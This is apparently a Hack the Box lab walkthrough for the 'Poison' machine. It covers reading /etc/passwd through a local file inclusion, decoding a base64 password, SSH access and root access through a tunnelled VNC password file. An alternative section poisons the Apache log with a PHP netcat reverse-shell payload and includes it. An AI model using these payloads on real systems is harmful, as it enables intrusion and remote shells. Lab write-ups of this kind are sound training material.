Hack the Box: Poison

Enumeration

Nmap

The Nmap scan shows OpenSSH on port 22 and an Apache web server on port 80, and the service banners identify the target as a FreeBSD system.

nmap -sVC 10.10.10.84

HTTP

Browsing the website, we can see a site with the title: “Temporary website to test local .php scripts”.

Submitting the listed script name “listfiles.php” in the input field sends us to the URL http://10.10.10.84/browse.php?file=listfiles.php. Among the files it lists is pwdbackup.txt.

Entering “pwdbackup.txt” into the “Scriptname” input field reveals a password that has been base64-encoded 13 times.

We can write a simple bash script to decode it.

#!/bin/bash

# secret.txt contains encoded text
encoded_text=$(<secret.txt)

for ((i=1;i<=13;i++)); do
    encoded_text=$(echo "$encoded_text" | base64 -d)
done

echo "$encoded_text"

After running the script we get back a password: Charix!2#4%6&8(0

The file parameter of browse.php is worth testing for local file inclusion (LFI): requesting /etc/passwd through it returns the file’s contents, so arbitrary local files can be read. The file shows a user called charix with a login shell, so the password we decoded is a good candidate for that account.

curl "http://10.10.10.84/browse.php?file=/etc/passwd"

Foothold

With the password found earlier we can SSH directly into the charix account.

ssh charix@10.10.10.84

The user flag can be obtained from the directory: /home/charix.

Privilege Escalation

In the home directory of user charix there is a file secret.zip.

After transferring the file to the Kali Linux machine, it can be extracted using Charix’s password.

The file command does not recognize the extracted file secret: it is binary data rather than text, so it is not a cleartext password.

Running the command ps aux on the target we can see an Xvnc process (a VNC server) being run as root.

ps aux

root   529   0.0  0.9  23620  8868 v0- S    14:42     0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthorit

ps truncates long command lines to the terminal width, so the entry above is cut off. Adding -ww prints the full command line, and there we can see that VNC is listening on port 5901 on localhost only.

ps -auxww | grep vnc

We can verify that with the netstat command.

netstat -an | grep LISTEN

Because the VNC server only listens on the target’s loopback interface, we forward local port 5000 on the Kali Linux machine to port 5901 on the target’s loopback so it can be reached from the attacker machine.

# ssh -L [local-port]:[remote-host]:[remote-port] [user]@[target]
# remote-host is resolved on the target, so 127.0.0.1 here is the target’s own loopback
ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

Trying to access VNC from the Kali Linux machine we need a password. Charix’s password didn’t work.

vncviewer 127.0.0.1:5000

The -passwd option of vncviewer takes a VNC password file (the obfuscated form written by vncpasswd), not a cleartext password. Supplying the file secret extracted from secret.zip connects successfully, so that file is evidently a copy of the password file used by the root-owned VNC server.

vncviewer 127.0.0.1:5000 -passwd secret

The root flag can be obtained from the directory: /root.

Other Method: Log Poisoning for Initial Foothold

Reading the Apache access log /var/log/httpd-access.log through the LFI, we can see that the User-Agent header of every request is written to it. That gives us control over text written into a file we can include, which is all a log poisoning attack needs.

curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log"

Intercepting a request in Burp Suite, we change the User-Agent header to a PHP one-liner that spawns a reverse shell to our listener (10.10.14.5, port 443). The payload is kept on a single line and uses only single quotes: Apache backslash-escapes double quotes when writing log entries, which would leave broken PHP in the log, and a parse error in any line breaks every later include of that log.

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 443 >/tmp/f') ?>

Set up a listener to receive the reverse shell:

nc -lvnp 443

Send the request from Burp Suite so the payload is logged, then include the poisoned log file through the LFI:

http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

The Netcat listener receives a shell as the web server user www.